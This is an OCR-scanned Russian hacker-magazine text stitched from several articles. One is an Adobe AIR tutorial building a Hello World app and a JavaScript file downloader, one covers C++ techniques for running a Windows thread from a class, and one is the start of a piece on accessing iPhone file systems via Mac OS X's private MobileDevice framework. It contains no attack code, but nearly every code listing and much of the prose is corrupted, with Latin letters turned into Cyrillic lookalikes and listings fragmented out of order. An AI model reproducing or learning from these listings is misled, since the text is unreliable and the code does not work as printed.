имеющие самое непосредственное отношение к разработке 
платформы АІР. У них есть чему поучиться. 

2 . Для каждого типа файлов должна быть своя директория. 
Разработка АІР-приложений очень напоминает создание типич- 
ного ѵѵеЬ-проекта — следовательно, тут можно и нужно пользо- 
ваться всеми вытекающими отсюда правилами (в плане струк- 
туры). Создавай для различных типов файлов соответствующие 
директории. Например, все С55, используемые проекте, лучше 
всего хранить в одноименной директории. Это относится и к изо- 
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В этой врезке я привел Ыті-код, который будет оформлять контент 
разрабатываемого приложения. Для первого приложения я не стал 
придумывать ничего особенного, а просто решил вывести посередине 
изрядно всех доставшую фразу «Неііо, ѴѴогШ» (На самом деле это я 
запретил ему использовать фразу «Р**ск уои, ѴѴогІсІ», а ничего лучше 
он придумать не смог — прим.ред.). Сохрани код, а затем открывай 
для редактирования файл арріісабоп.хті. Этот файл предназначен 
для хранения настроек АІР-приложения, и по-научному его принято 
называть дескриптор приложения. В дескрипторах хранится вся необ- 
ходимая информация о приложении: номер версии, оформление окна, 
название, идентификатор и прочее. В своем проекте я дал дескрип- 
тору имя арріісабоп.хппі. Это имя не является обязательным, поэтому 
ты можешь обозвать свой дескриптор как угодно. Внутренности 
моего дескриптора я привел во врезке «Внутренности дескриптора». 
Неожиданно, ведь правда? 

Внутренности дескриптора 

<?хш1 ѵегзіоп= " 1 . О " епсосііпд= "икк-Б " ?> 

<арр1ісакіоп хш1пз= "кккр : / /пз . асЬоЪе . сош/аіг/ 
аррІісаСіоп/1 . О " > 

<і<±>сот . хакер . НеІІоШогІск/ і<±> 

<кі1епате>Не11о Шог1с1</к11епате> 

<ѵегзіоп>1 . 0</ѵегзіоп> 

<кік1е>Не11оШог1с! Арр1ісакіоп</кік1е> 

< іпі к і аШі псіоѵ7> 

<сопкепк>Не11оМог1б.ккт1</сопкепк> 

<ѵізіЫе>кгие</ѵізіЫе> 

<кеідкк>100</кеідкк> 

<мі<5кЬ.>300</ѵ7Ісік]і> 

<х>100</х> 

<у>100</у> 

< / іпікіаШіпсЗо^> 

</арр1ісакіоп> 



Структура проекта «НеІІоѴѴогІсІ» 

бражениям, ЭаѵаЗсгірЬсценариям, иконкам и так далее. В своих 
проектах я придерживаюсь примерно такой структуры: 

«Проект» 

сзз // директория хранит все сзз-файлы 
33 //в этой папке хранятся все сценарии 33 

ішадез// папка для изображений 

// конфигурационные файлы и другие основные файлы 

Попробуем повторить вышесказанное на практике. Создай для 
проекта три директории: сбб, іппадеБ, )б. Затем в корень проекта 
добавь два файла: арріісабоп.хті и НеІІоѴѴогІсІ.ЫтІ. Мою структу- 
ру проекта ты можешь увидеть на соответствующем рисунке. 
Теперь возьмемся за редактирование созданных файлов. Начнем 
с НеІІоѴѴогІсІ. Ыті. Этот файл является контентом приложения. 

Под контентом я подразумеваю основное содержимое проекта. 
Здесь могут быть указаны как Ыті-, так и зѵѵкфайлы. В своих 
примерах я буду ориентироваться на Ыті- контент. Итак, откры- 
вай файл НеІІоѴѴогІсІ. Ыті в режиме редактирования кода и напи- 
ши в нем код из врезки «Содержимое НеІІоѴѴогІсІ. Ьіті». 

Содержимое НеІІоѴѴогІсІ. Мті 

<Ькш1> 

<кеаб> 

<кік1е>Не11о ЭДогІсІ кгот АІК</кік1ех/Ь.еасЬ> 

<ЪосІу> 

<сепкег><Ы>НЕЬЬО , ЖЖЬВІ </Ых/сепкег> 

</Ьобу> 

</Ъ.кт1> 



Попробуем разобраться в том, что я здесь накорябал. В самой 
первой строчке я описываю объявление ХМІ_. Далее открываю 
начало элемента арріісаііоп — это основной элемент и он должен 
содержать в себе все другие элементы, описывающие дескрип- 
тор. Сам же арріісаііоп должен содержать атрибут хппіпб с ука- 
занным путем к пространству имен ХМІ_. Существует несколько 
пространств имен для АІР-приложений. Главное их отличие 
— номер версии. Я указал первую. Для большинства приложе- 
ний нужно поступать таким же образом. А к чему относится этот 
номер версии? Под этим номером подразумевается минимальная 
версия платформы АбоЬе АІР, необходимая для выполнения при- 
ложения. Внутри элемента арріісаііоп у меня располагается еще 
ряд элементов: 

• ісі — уникальный идентификатор АІП-приложения. Официальная 
документация рекомендует использовать значения формата «сот. 
имя_издателя.название_приложения». Максимальная длина иден- 
тификатора может составлять 212 символов; 

• кііепаше — имя аіг-файла. Помимо имени, это значение 
используется в качестве наименования приложения во время 
инсталляции (при условии, что отсутствует элемент пате). 

• ѵегзіоп — версия приложения: 

• кікіе — заголовок окна инсталлятора; 

• іпікіаІМпсІоцг — элемент отвечает за контент и его пред- 
ставление. В качестве контента может быть как Бѵѵб-, так и Ыті- 
файл (в нашем случае). Данный элемент может содержать дочер- 
ние элементы: 

• сопкепк — имя файла с контентом приложения; 

• ѵізіЫе — видимость приложения; 

• цгісікк — ширина окна приложения; 

• Ьеідкк — высота окна приложения; 

• х — координата позиции на оси X; 

•У — координата позиции на оси У; 
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Б) Просто» мгруічик файлов; 




][ качалка 0.1 Л 



Что качать: Нйр:// 

Куда сохранять! С:\мтр\ 
Скачать* 



в Престол ыгр/зчніе файлов; 



I 



0 



][ качалка 0.1 Л 



Чтп нзчдть: 

[ьйр*./>| | 

| Куда сохранять: [ Скачать! 

Сі№гп0\ 






Выглядит неприятно? 



Немного С55 — и наше приложение расцвело 



• кгапзрагепк — прозрачность окна; 

• гезігаЫе — возможность изменения размера окна; 
и т.д. 

В дескрипторе также могут присутствовать другие элементы. О них 
ты узнаешь, прочитав официальную документацию или заметку на 
моем сайте ѵг-опІіпе.ги/сопі:еп1:/асІоЬе-аіг-сІігесі:іѵе5-2003 . На этом 
можно считать, что процесс разработки простейшего приложения 
для платформы АсІоЬе АІР завершен. Попробуем его протестиро- 
вать. Жмем в Аріапа Эіисііо кнопку «Выполнить» и лицезреем пока 
не очень красивую картинку (смотри соответствующий рисунок). 
Наше приложение готово, но выглядит оно, мягко говоря, не 
очень. Да и функционал в нем сомнительный. Хорошо, сейчас 
мы немного усложним задачу и доработаем наш «Неііо ѴѴогІсІ» до 
более интересного состояния. 

Делаем качалку файлов 

Я долго думал, какой пример стоит рассмотреть, и решил остано- 
виться на создании простейшей качалки файлов. Почему именно 
качалки? Так ведь алгоритм получения информации с удаленных 
серверов нужен сплошь и рядом, поэтому рассмотренный пример- 
чик обязательно пригодится в будущем. 

Добавь в Аріапа Эіисііо новый проект и присвой ему имя 
«ЗітрІеОоѵѵІоасІ». Сразу же приведем свежесозданный проект 
к единой структуре — создай в папке проекта дополнительные 
папки: С55, І5, іппадез. Я уже говорил, что привыкать к правиль- 
ному нужно с самого начала. Следующим твоим действием будет 
создание файла-дескриптора для будущего приложения. Его код 
я приводить не стану, так как он полностью идентичен тому, кото- 
рый написан во второй врезке. Скопируй его или набери заново, 
а после этого создавай файл ЗітрІеРоѵѵпІоасІег.Ыпп . Ты уже зна- 
ешь, что в этом файле будет располагаться основная программная 
начинка нашего приложения. Сразу же нарисуем в этом файле 
интерфейс. НТМІ_-код элементов управления я привел во врезке 
«Делаем интерфейс приложения». 

Делаем интерфейс приложения 

<Ъос1у> 

<сепкегхЫ>] [ качалка 0 . 1 . 1</Ы></ сепІегхЬг /><Ъг /> 
<Ъ><1аЬе1 с1азз= " ІаЬеІ " >Что качать: </Ь> 

<іприк куре=" СехЪ" іс!= " ТІ1е_иГІ " ѵа1ие= "ЬЪЪр : // " 
зІ 2 е=" 30 "х/1аЬе1хЬг /> 

<Ъх1аЪе1 с1азз= " ІаЬеІ " >Куда сохранять :</Ь> 
сіприк куре="Цехк" іс!= " заѵе_раЪЪ." ѵа1ие="С: \Ъетр\ " 
зІ 2 е=" 30"х/1аЬе1хЬг /> 

<ЬиЦЦоп опс1іск= "ЬошіІоасІІЦ () ; " >Скачать ! </ЬиЦДоп> 
</Ъос1у> 

Перепиши приведенный код и попробуй запустить приложение. Если 
от вида приложения ты почувствуешь рвотные позывы — не огорчай- 



ся: не все, что делается в АбоЬ’овских и Арріе’вских продуктах, долж- 
но быть прекрасным. Сейчас я покажу, как можно быстро исправить 
ситуацию при помощи всего лишь нескольких строк езз-кода. 
Закрывай запущенный пример и создай в папке с езз новый файл. 
Присвой ему имя зіуіе.езз и напиши в него следующее: 

.ІаЬеІ { 

:Е1оаЦ : ІеіЩ ; 
місіЦЬ: 2 0еш; 

СехЦ-аІідп: Іе^Ц; 
сіеаг : ІеіЩ; 
тагдіп-гідЬЪ : 2 0рх; 

СОІОГ : #А77РРР; 

} 

Ы { 

соІог : #008СРР; 

} 

Сохрани внесенные в файл изменения и подключи созданный езз- 
файл к ЗітрІеОоѵѵпІоабег.НітІ. Подключение выполняется при помо- 
щи одной строчки кода (ее пишем в ЬеасІ): 

<1іпк Ьге^=" езз/зкуіе.езз" ге1=" зкуІезЬеек" теЬіа= "аіі " 

/> 

Как справишься с этим заданием, вновь выполни сохранение проекта 
и проведи повторный запуск. Если ты все сделал без косяков, то наш 
гадкий утенок получит более презентабельный вид. После примене- 
ния С55 все стало выглядеть лучше, но это еще не повод останавли- 
ваться. Если ты пользуешься С55 не первый день, то тебе не составит 
труда придать приложению еще более шикарный вид. 

На этом можно считать, что разработка красивостей окончена, и 
пора переходить к написанию ЗаѵаБсгірІ кода. Эх, как вспомню, что 
еще каких-то лет восемь назад никто и подумать не мог, что язык 
ЗаѵаЗсгірІ начнет использоваться повсеместно... А сегодня уже 
тяжело представить жизнь без него. Для создания иксовой качал- 
ки нам потребуется помощь библиотеки АІРАІіазез^'з, входящей в 
состав АбоЬе АІР ЭйК. Подключим ее к нашему файлу-контенту: 

<зсгірк куре= ,, Цехк/заѵазсгірк м згс= " ІіЬ/аіг/АІКАІіазез . 

3 3" х/зсгірк> 

Из этой библиотеки мы воспользуемся объектами ІІПЬЭітеапп, 

I) Р ЬРец и езі; и так далее. При помощи первого, собственно, и 
будет выполняться загрузка файла с удаленного сервера. В 
5йК есть другой (более простой в обращении, хотя...) объект, 
при помощи которого можно организовать загрузку файлов, но 
11Р1_51геат куда лучше подходит для загрузки больших файлов 
(см. соответствующую врезку). 
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ССЮІЫ6 



Загрузка файлов 

Еипс1:іоп (іошіІоасІІЦ ( ) 

{ 

ѵаг Ті1е_иг1 = 

сІоситепЦ . деСЕІетепЦВуІсІ ( ' Ті1е_иг1 ' ) .ѵаіие; 
ѵаг заѵе_раСЬ. = сІоситепС . деЦЕІетепЦВуІсІ ( 

' заѵе_раС]г ')• ѵаіие + "\\" 

+ СеСЕіІепате ( іі1е_иг1 ) ; 

ѵаг с!оѵт1оас1_иг1 = пехѵ аіг .ШЬКедиезВ (Ті1е_иг1) ; 
ѵаг игІЗСгеат = пеѵ/ аіг .ІЖЬЗСгеат ( ) ; 
ѵаг іііе = пеѵ/ аіг.ЕіІеО; 
іііе . паСіѵеРаСЪ. = заѵе_раСІі; 

ѵаг ТіІеЗЕгеат = пем аіг . ЕіІеЗВгеат ( ) ; 

игІЗВгеат. асИЕѵепВЬізСепег ( 

аіг . РгодгеззЕѵепС . РКОСКЕЗЗ , 

ТипсСіоп ( ) { 

ѵигіВеТоЕіІе (еѵепС , игІЗЕгеаш, ТіІеЗСгеат) ; 

} , іаізе) ; 

игІЗВгеат. асІсІЕѵепВЕізСепег ( 
аіг . ЕѵепС . СОМРЬЕТЕ , 

ТипсВіоп ( ) { 

заѵеЕіІе (еѵепС , игІЗВгеат, ТіІеЗВгеат) ; 

} , іаізе) ; 

ТіІеЗВгеат. ореп ( іііе , аіг . ЕіІеМосіе .Ш.ІТЕ) ; 
игІЗВгеат. Іоасі (<Тоѵт1оас1_иг1) ; 

} 

ТипсВіоп шгіВеТоЕіІе (е , игІЗСгеат, ТіІеЗВгеат) 

{ 

іі (игІЗСгеат.ЪуСезАѵаіІаЫе > 0) 

{ 

ѵаг ЦаСа = пехѵ аіг.ВуСеАггауО; 
игІЗСгеат. геасІВуСез (сІаСа, 0, 
игІЗСгеат.ЬуВезАѵаіІаЫе) ; 

ТіІеЗВгеат. шгіСеВуСез (сіаСа, 0, сІаСа . ІепдВЬ) ; 

} 

} 

ТипсВіоп заѵеЕіІе (е, игІЗСгеат, ТіІеЗВгеат) 

{ 

ѵаг сІаСа = пекг аіг.ВуСеАггауО; 
игІЗСгеат. геасІВуСез (сІаСа, 0, 
игІЗЕгеат.ЬуЕезАѵаіІаЫе) ; 
іі1еЗСгеат.ѵ\пгіСеВуВез (сІаСа, 0, сІаСа . ІепдВіі) ; 

ТіІеЗВгеат. сіозе ( ) ; 

аІегС ( "Загрузка файла завершена! " ) ; 

} 

На первый взгляд этот код может показаться слишком большим и 
сложным. Ну и что, зато если написать то же самое на 0е1рЫ/С++, 
то по объему получится еще больше, а на внешний вид — еще 
страшнее. 

В самом начале листинга я определяю ряд служебных переменных. 
Нарочно не делаю никаких дополнительных проверок, я доверяю 
и сохраняю в переменные Л1е_иг1 и заѵе_ра1:б ссылку на загружае- 
мый файл и путь записи файла на локальном компьютере соот- 
ветственно. Получив пути к файлам, я создаю экземпляры объектов 
ІІПЕРециезІ (содержит путь к загружаемому файлу), ІіРІ_5ігеат 
(наш поток) и Рііе (взаимодействие с файлами). После завершения 
инициализации объектов необходимо запустить процесс закачки 



файла и определить обработчики событий. Во время их срабатыва- 
ния будут выполняться функции ѵѵгіІеТоРіІеО и заѵеРіІеО. Как только 
наше приложение получит определенную порцию данных, будет 
вызываться функция, выполняющая их запись. Событие С0МР1_ЕТЕ 
будет свидетельствовать о завершении загрузки файла и вызовет 
функцию заѵеРіІеО. Она запишет последние полученные данные и 
закроет файл. 

Собственно, на этом разбор листинга можно считать оконченным. 

Я понимаю, что тебе многое может быть непонятным, но я и так 
превысил выделенный для статьи лимит места, и редактор уже 
угрожает мне анальной стимуляцией, поэтому не подводи меня, 
а проштудируй самостоятельно справочник по 65 (без этого в 
мире АІР делать нечего). Особо пристальное внимание обрати на 
анонимные функции. С их помощью я решил проблему передачи 
дополнительных параметров в функции ѵѵгііеТоРі 1е() и заѵеРіІеО. 

Полет окончен 

АбоЬе АІР предоставляет массу возможностей. Чтобы начать 
писать приложения для этой платформы, не нужно быть супер- 
гуру с десятью килограммами мозгов. Достаточно почитать 
немного литературы и подойти к делу максимально творчески. 
При всей простоте, эта технология смогла завоевать популяр- 
ность как среди компаний-гигантов (например, уабоо), так и 
среди простых разработчиков. РІадеюсь, она понравится и тебе. 
Удачи! цц 



Не АІК единым 



АбоЬе АІР — штука прикольная, ноуже сейчасу него есть достаточно 
сильный оппонент. Имя ему — Тбапіит (как-то в ][ была статья про 
эту зверюшку). По сути, ТіШпіит умеет многое из того, что и АбоЬе 
АІ Р, плюс несколько оригинальных и, самое главное, полезных фич: 
возможность выбора в качестве языка программирования Рубзоп, 
Рыбу, РН Р и ЧаѵаЗсгірІ;; создание дополнительных процессов; НТТР- 
сервер; асинхронные события и так далее. Помимо всего перечис- 
ленного, Тііапіит ( аррсеІегаІюг.сот/ргосІисЫ дурманитзапахом 
полной свободы. Это полностью бесплатный (в отличие отАбоЬе АІР) 
ОрепЭоигсе продукт. Вдобавок к этому, титаниум позволяет не только 
разрабатывать, но и распространять приложения, получая детальную 
статистику по загрузкам. 



Простейший способ переноса 
ѵѵеЬ-приложения на десктоп 



После прочтения статьи ты наверняка захочешь смастерить десктоп- 
ный вариантсвоего сайта/блога или еще чего-либо. Несомненно, 
тебе вэтом поможет платформа АбоЬе АІР, ноучти, что длятиповых 
ситуаций есть более простой способ. Я говорю о проекте Моііііа Ргізт 
( ргізт.тогіЦа.сот ). По адресу сайта проекта несложно понять, что его 
курирует МогіІІа Согрогабоп — разработчики браузера ЕігеЕох. При 
помощи Ргізт ты сможешь в несколько кликов сотворить десктопную 
версию любого ѵѵеЬ-сервиса. Стоиттолько отдавать себе отчет в том, 
что полноценный перенос с хранилищем для данных, созданных во 
время автономной работы, Ргізт, конечно же, сделать не сможет. 
Перенос таких проектов без программирования нереален. А вот 
избавиться от браузера для работы с определенным ѵѵеЬ-сервисом 
вполне можно. Какэто будет выглядеть? Ты выбираешь сайт или 
сервис (например, почту) и вбиваешь соответствующие настройки в 
конфигуратор Ргізт. После этого будут созданы ярлыки для быстрого 
запуска. Когда потребуется зайти в ѵѵеЬ-почтовик, достаточно будет 
запустить ярлык, и ты сразу же окажешься в почтовом ящике. Другими 
словами, Ргізт представляет собой простейший браузер (основан на 
ХІЛРиппег) без привычного 6111. 
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© Сегодня практически все ОС поддерживают многозадачность. Потоки, процессы и прочие 
атрибуты сейчас уже не кажутся чем-то страшным и необычным. Мультипоточность 
используется практически в любом современном приложении. А еще в наше время очень 
активно применяется ООП. Сегодня мы узнаем, как в С++ подружить между собой и 
многопоточность, и ООП. 



Перед нами стоит задача написать класс, который будет запускать 
некоторый код в отдельном треде. Для этого будем использовать 
стандартную функцию ѴѴіпсІоѵѵз АРІ — СгеаІеТЬгеасІ. Более подхо- 
дящим решением было бы применить _Ьедіц№геасІ из стандартной 
библиотеки, но для отражения общей сути СгеаІеТЬгеасІ вполне сго- 
дится. Давай взглянем на код. 

Создание потока из класса 

БШКБ ЖЫАРІ ТйгеасіЕипс (БРѴОІБ ІрРагаш) 

{ 

// тут мы не можем получить доступ к 

// закрытым членам класса 

гебигп 0; 

} 

сіазз МуСІазз 

{ 

риЫіс : 

МуСІазз (ѵоісі) | 

-МуСІазз (ѵоісі) ; 

ѵоісі КипТйгеас! ( ) ; 

ргіѵаВе : 

іпі. ш_іпВѴаг; 

} ; 

ѵоісі МуСІазз :: КипТЬгеасі ( ) 

{ 

НАБББЕ ЬТЦгеаб; 

БШКБ ібТЬгеасі; 

ЪТЪхеас! = : : СгеаВеТЬгеасі (ШББ , 0, &ТЬгеасІРипс , 

0, 0, &ісШігеасі) ; 

} 

Все очень просто. Есть класс МуСІазз, который создает поток с 
помощью СгеаІеТЬгеасІ. Потоковая функция ТЬгеасІРипс нахо- 
дится вне класса. Компилируется этот код без проблем, но есть 
несколько нюансов, из-за которых такое решение может оказать- 
ся неприемлемым. 

Основная проблема заключается в том, что мы не можем полу- 
чить доступ к внутренним методам и переменным класса. Первое, 
что приходит в голову для решения этой задачки — сделать пото- 
ковую функцию членом класса. То есть примерно так: 



Потоковая функция — член класса 

сіазз МуСІазз 
{ 

риЫіс : 

ѵоісі КипТЬгеасі ( ) ; 
ргіѵаіе : 

БТлЮКБ ЖЫАРІ ТЬгеасіЕипс (ЬРѴОІБ ІрРагаш); 
іпі. т_іпВѴаг; 

} ; 

БШЕБ ЖМАРІ МуСІазз : : ТЬгеасіРипс (ЬРѴОІ Б ІрРагаш) 
{ 



геіигп 0; 

} 

ѵоісі МуСІазз :: КипТЬгеасі ( ) 

{ 

НАМБЬЕ ЦТЬгеасі; 

БШРБ ісіТЬгеасі; 

II на такой код будет ругаться компилятор 

ЬТйгеаб = : : СгеаБеТЬгеасі (ШЬЕ , 0, &ТІігеа(іЕипс , 

0 , 0 , &ібТІігеасі) ; 

} 

Но если попробовать скормить этот код компилятору, то мы 
получим ошибку, суть которой заключается в том, что тип пото- 
ковой функции не соответствует требуемому. Если копнуть 
глубже, то мы поймем, что компилятор просто не может понять, 
адрес какой именно ТЬгеасІЕипс передавать в качестве третьего 
параметра в СгеаІеТЬгеасІ. При этом объектов МуСІазз может 
быть создано несколько, и располагаться они могут в любом 
куске памяти, а АРІ для создания треда требует указания точно- 
го адреса потоковой функции, который, понятное дело, стано- 
вится известен лишь во время выполнения программы. Так что 
компилятор лишь разводит руками и предлагает еще немного 
пораскинуть мозгами. 

Следующее, что приходит в голову, это опять вынести 
ТЬгеасІЕипс за пределы класса, но в этот раз сделать ее друже- 
ственной к МуСІазз с помощью директивы ІтіепсІ. Объявленная 
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таким образом потоковая функция должна без проблем полу- 
чить доступ к ргіѵаіе членам МуСІазз. Но, так как ТЬгеабРипс 
существует в единственном экземпляре, а объектов класса 
может быть множество, то нам придется передавать потоковой 
функции в качестве параметра указатель на создающий тред 
объект. 

Потоковая функция, дружественная классу 

ШОКБ ШЫАРІ ТбгеабРшіс (6РѴ0ІБ ІрРагаш) ; 

сіазз МуСІазз 

{ 

риЫіс : 

ѵоіб КипТбгеаб. ( ) ; 

ІгіепсІ БШРБ ШЫАРІ ТбгеабРипс (6РѴ0ІБ ІрРагаш); 

ргіѵабе : 

іпР т_іпбѴаг; 

} ; 

ШОКБ ШЫАРІ ТбгеабРипс (6РѴ0ІБ ІрРагаш) 

{ 

// а тут мы уже можем обращаться к ргіѵабе членам 

МуСІазз* тс = (МуСІазз* ) ІрРагаш; 

тс->т_іпбѴаг = 90; 

соиб « _Т("36агб Ыігеаб, ш_іпЪѴаг = ") 

« шс->ш_іпбѴаг ; 

геРигп 0; 

} 



ѵоіб МуСІазз :: КипТбгеаб ( ) 

{ 

НАШ6В бТбгеаб; 

Ш(ЖО ібТЬгеаб; 

// передаем потоковой функции указатель на 

/ / текущий объект 

йТЬгеаб = : : СгеабеТЬгеаб (N1166 , 0, &ТЬгеабРипс , 

бМз, 0, &ісШігеас1) ; 

} 

Все в этом примере хорошо, за исключением одного: к ТЬгеабРипс 
можно обратиться в обход МуСІазз, а это не только делает бессмыс- 
ленным создание отдельного класса для проектирования потока, 
но и нарушает инкапсуляцию — основной принцип объектно- 
ориентированного программирования. Потоковая функция имеет 
доступ к закрытым членам класса, а следовательно, любой желаю- 
щий может их изменить, нарушая все законы ООП. 

Очевидно, что для решения проблемы с инкапсуляцией нам надо 
вернуть ТЬгеабРипс обратно в пределы класса. Ріо, как мы уже 
видели выше, компилятор отказывается работать с таким кодом. 
Исправить это можно, объявив потоковую функцию статической. В 
этом случае ее адрес будет известен на этапе сборки программы, 
что позволит избежать проблем с компиляцией. 

Ріо так как функция-член ТЬгеабРипс статическая, то, работая с дру- 
гими членами МуСІазз, она не сможет корректно определить, с каким 
именно объектом класса ей нужно производить те или иные действия. 
Как и в случае с дружественной функцией, нам надо будет передавать 
потоку в качестве параметра указатель на текущий объект. 

Статическая потоковая функция — член класса 

сіазз МуСІазз 
{ 
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М50Ы может рассказать много полезного о СгеаІеТНгеасІ 

риЫіс : 

ѵоіб КшТРЬгеаб ( ) ; 
ргіѵабе : 

збабіс ОѴЮКБ ѴШГАРІ ТйгеабРипс (ЬРѴОІБ ІрРагаш); 
іпб т_іпбѴаг; 

} ; 

ВДОШ ШШАРІ МуСІазз : :ТЬгеасІРипс (ЬРѴОІБ ІрРагаш) 

{ 

// и тут мы уже можем обращаться к ргіѵабе членам 
МуСІазз* шс = (МуСІазз* ) ІрРагаш; 
гпс->т_іпбѴаг = 90; 

соиб « _Т ( " Збагб бЪгеасІ, т_іпбѴаг = " ) 

« тс->т_іпбѴаг ; 




Дружественная классу потоковая функция успешно 
изменяет его закрытые переменные 

Воспользовавшись этой директивой и немного подправив код, 
потоковую функцию уже можно не делать статической. Для боль- 
шей наглядности посмотрим КОД: 

Использование сіозиге 

буребеб ипзідпеб Іопд ( зббсаіі *ТЪбРипс) (ѵоісі 

*агд) ; // прототип функции потока 

буребеб ипзідпеб Іопд ( сіозиге *СІаззМеббюсІ) (ѵоіб 

*агд) ; // прототип метода класса 

/ / данное объединение позволяет решить несостыковку с 
типами 

буребеб ипіоп 
{ 

ТЬгбРипс Рипсбіоп; 

СІаззМебЪосІ МебЬоб; 

} бТЬгбАббг; 

сіазз МуСІазз 
{ 

ргіѵабе : 

бТЬгбАббг Аббг; 



гебигг. 0 ; 

} 

ѵоіб МуСІазз :: КипТЬгеаб ( ) 

{ 

НАШЬЕ ЬТЬгеаб; 

БШКБ ібТЬгеаб; 

// передаем потоковой функции указатель 
// на текущий объект 

ЬТйгеаб = : : СгеабеТЬгеаб (N1166, 0, &ТйгеабРипс , 

0, 0, &ібТЬгеаб) ; 



ргобесбеб: 

ипзідпеб Іопд ТЬгеабРипс (ѵоіб *агд) 

{ 

} ; 

риЫіс : 

КипТЬгеаб ( ) 

{ 

БШКБ ібТЬгеаб; 

Аббг.Меббюб = &ТЬгбНапб1е; 

// тут идет преобразование указателя 



Теперь мы решили все наши проблемы. Внеся код треда в 
МуСІазз, мы обошли сложности с инкапсуляцией — теперь доступ 
к закрытым членам класса осуществляется только лишь из мето- 
да класса. А объявив ТбгеабРипс в ргіѵаіе блоке, мы тем самым 
лишили пользователей нашего класса возможности вызвать 
потоковую функцию напрямую. 

Этот вариант решения нашей задачки можно назвать самым 
оптимальным и, казалось бы, остановиться на этом. Но есть еще 
один трюк, в основном для любителей С++ ВиіШег, о котором я 
должен рассказать. 

Реализация компилятора от Борланда содержит в себе директи- 
ву сіозиге, которая служит для определения типа обработчика 

события. Вообще, обработчик события представляет собой указа- 
тель на функцию. Обычно этот указатель имеет 4-байтный размер, 
но при определении такого типа указателя функции передается 
еще и указатель 1Ыз на экземпляр класса, поэтому указатель 
имеет 8-байтовый размер. 



} ; 



}; 



СгеабеТйгеаб (ШЪЬ , 0, Аскіг . Рипсбіоп, 
бйіз, 0, &ібТйгеаб) ; 



Конечно, такое решение пригодно лишь для использования его в 
среде ВиіШег, а многие программисты считают его грязным хаком. 
К тому же, использование объединений для решения проблем с 
типизацией — то еще извращение. Но, с другой стороны, если код 
работает корректно — значит, он имеет право на существование. 

Заключение 

Теперь мы можем писать ООП-код, который выполняется в раз- 
личных потоках. Перечисленные выше способы не являются един- 
ственными — возможно, кто-то придумал что-то более интересное 
для реализации данной задачи. Но для написания качественных 
программ этого вполне достаточно, ц-ц 
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Закрытые возможности Мае 05 X для работы 
с мобильными устройствами от Арріе 

о Из этой статьи ты узнаешь, как можно общаться с іРНопе, іРаб и 
іРоб іоисИ из своих программ под Мае 08 X, не прибегая к скриптингу 
іТипез. В результате сегодняшней работы мы получим полный 
доступ к файловой системе мобильного устройства с помощью 
закрытого фреймворка МоЬіІе Веѵісе Ргашеѵѵогк. 



Введение 

Мне нередко приходилось видеть в сети вопросы типа: «Можно ли 
использовать мой іРЬопе как флешку?». Действительно, памяти на 
устройстве установлено немало, хотелось бы иметь возможность 
использовать ее свободно, а не только для хранения файлов, полу- 
ченных через іТипез в различных сервисах Арріе. Однако іРЬопе’ы 
и іРосГы (имеются в виду іРосІ ІоисЫ при подключении не монтиру- 
ются как съемные носители ни в Мае 05 X, ни в виндах. 

Арріе действительно не предоставила такой функциональности в 
своих устройствах, но общественность не дремлет, и со временем 
появилось множество утилит, которые дают пользователю возмож- 
ность работать с устройством Арріе как со съемным носителем. 
Некоторые из них устанавливаются на іРЬопе, некоторые — на хост. 
Одни работают через ѴѴі-РІ (например РІазЬОгіѵе), другие — через 
115В (іРЬопе РоШегз). Нас будет интересовать в основном работа 
через 115В - ѴѴі-Рі не везде есть, да и скорость обмена данными в 
этом случае оставляет желать лучшего. 



Готовые тулзы 

Их немало. Те, что работают через 115В, можно условно разделить 
на два класса: одни нужно ставить на мобильное устройство (тогда 
потребуется и )аіІЬгеак), другие следует устанавливать на хост. 

В качестве примера последних можно привести іРЬопе ШШегз 
( ірЬопеіоШегз.сот ). іРЬопе РоШегз — это расширение ѴѴіпсІоѵѵз 
Ехріогег, которое позволяет просматривать, копировать и удалять 
содержимое іРоб Іоисб или іРЬопе, соединенного с компьютером 
через 115В, как в обычной папке проводника. В общем, у аппарата 
появляется функциональность обычного съемного диска, при этом 
]а і ІЬгеа к не требуется, но на хосте должен быть установлен ІТипез. 
Таких поделок существует достаточно много (ТоисЬ Огіѵе, Тоисб 
Сору и тому подобные), а некоторые из них даже стоят денег, хотя, 
как мы потом увидим, ничего сложного в создании таких прог нет. 

В качестве аналогичного решения для Мае 05 X можно привести 
іРЬопеОізк — плагин к МасРизе, который также позволяет работать 
с файловой системой іРЬопе. 
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Папки іРЬопе можно видеть в РіпсІеГе благодаря 
іРЬопеОізк 



Среди прог, которые устанавливаются на само мобильное устройство 
и обеспечивают его монтирование при подключении как съемного 
носителя, можно отметить, например, 115В Огіѵе, которая доступна 
через Субіа. Подобные приложения имеют существенные недостат- 
ки, потому что они, как правило, предлагают на выбор три режима 
работы, для переключения между которыми требуется перезагрузка 
мобильного устройства. В режиме йеівиіі устройство будет работать 
как обычно: гаджет можно будет использовать в качестве модема, 
распознавать его в іРЬоіо как фотокамеру (по протоколу РТР — Рісіиге 
Тгапзіюг Ргоіосоі) и синхронизировать с ІТипез. 

Второй режим, Огіѵе + ІТипез, работает только в Мае 05 X. В этом слу- 
чае интерфейс РТР будет заменен другим, Мазз 5іогаде, что позволит 
использовать девайс в качестве ІІ5В-флешки. При этом синхрониза- 
ция с ІТипез и дебаггер ХСобе продолжат работать как в дефолтном 
режиме. А в режиме Огіѵе Опіу устройство определится только как 
ІІ5В-ДИСК. При этом он будет виден в любой операционной системе. 

Протоколы ІТипез 

Все тайное рано или поздно становится явным, и как бы Арріе не 
пыталась закрыть протоколы, по которым ее мобильные устройства 
взаимодействуют с ІТипез, всегда найдутся ребята, которые все это 
прогонят под ІІ5В-снифером, отреверсят софт, драйвера и проведут 
все остальные необходимые операции. Так как Арріе традиционно не 
поддерживает Ыпих, обеспечивать работу ее устройств в этой опера- 
ционке пришлось сообществу. Так появился проект ІіЬітоЬіІебеѵісе 
[ ІІЬітоЬіІебеѵісе.огд ]. ІіЬітоЬіІебеѵісе — это библиотека, которая обе- 
спечивает взаимодействие с іРЬопе, іРоб ІоисЬ, іРаб и Арріе ТѴ. В 
отличие от других подобных проектов, она не зависит от стороннего 
проприетарного программного обеспечения и не требует ]аіІЬгеак’а 
устройств. Эта библиотека позволяет другим приложениям свободно 
работать с данными на мобильных устройствах, делать бэкапы, управ- 
лять иконками 5ргіпд ВоагсІ, управлять установленными на устрой- 
ствах приложениями, синхронизировать музыку и видео. 

На рисунке видно, что библиотека взаимодействуете 115В- 
устройствами через ІіЬизЬ-1.0. избтихсі — демон, который обе- 
спечивает мультиплексную передачу данных по ТСР/ІР через 115В- 
интерфейс. Таким образом, для остального софта ІІ5В-интерфейс 
